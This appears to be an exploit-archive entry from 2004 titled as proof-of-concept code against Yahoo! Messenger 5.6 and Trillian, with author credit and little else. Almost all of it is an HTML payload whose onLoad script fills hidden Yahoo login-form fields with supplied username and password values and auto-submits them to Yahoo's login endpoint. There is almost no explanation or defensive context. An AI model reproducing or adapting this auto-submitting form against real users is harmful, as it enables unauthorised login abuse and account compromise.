Yahoo! Messenger 5.6 and Trillian Proof Of Concept
Code Exploit
|
Date: 2004-04-13
|
Author : Rafel Ivgi, The-Insider <theinsider@012.net.il>
Download : N/A
<html>
<head>
<script>
<!--
var username;
username='<username>';
var password;
password='<password>';
function submit () {
document.getElementById('login').value=username;
document.getElementById('passwd').value=password;
document.getElementById('login_form').submit();
};
//-->
</script>
</head>
<body onLoad='submit();'>
<form method=post action="https://login.yahoo.com/config/login"
autocomplete=off name=login_form id=login_form onsubmit="return
alert(document.forms['login_form'].login.value)">
<input type="hidden" name=".tries" value="1">
<input type="hidden" name=".src" value="ym">
<input type="hidden" name=".md5" value="">
<input type="hidden" name=".hash" value="">
<input type="hidden" name=".js" value="">
<input type="hidden" name=".last" value="2">
<input type="hidden" name="promo" value="">
<input type="hidden" name=".intl" value="us">
<input type="hidden" name=".bypass" value="">
<input type="hidden" name=".partner" value="">
<input type="hidden" name=".v" value="0">
<input type="hidden" name=".yplus" value="">
<input type="hidden" name=".emailCode" value="">
<input type="hidden" name="plg" value="">
<input type="hidden" name="stepid" value="">
<input type="hidden" name=".ev" value="">
<input type="hidden" name="hasMsgr" value="0">
<input type="hidden" name=".chkP" value="Y">
<input type="hidden" name=".done" value="http://mail.yahoo.com">
<input type="hidden" id="login" name="login"
size="17" value="">
<input type="hidden" name="passwd" id="passwd"
size="17" maxlength="32">
<input type="hidden" name=".save" value="Sign
In">
</form></body>
</html>
|
Search
Advisories
| Backend
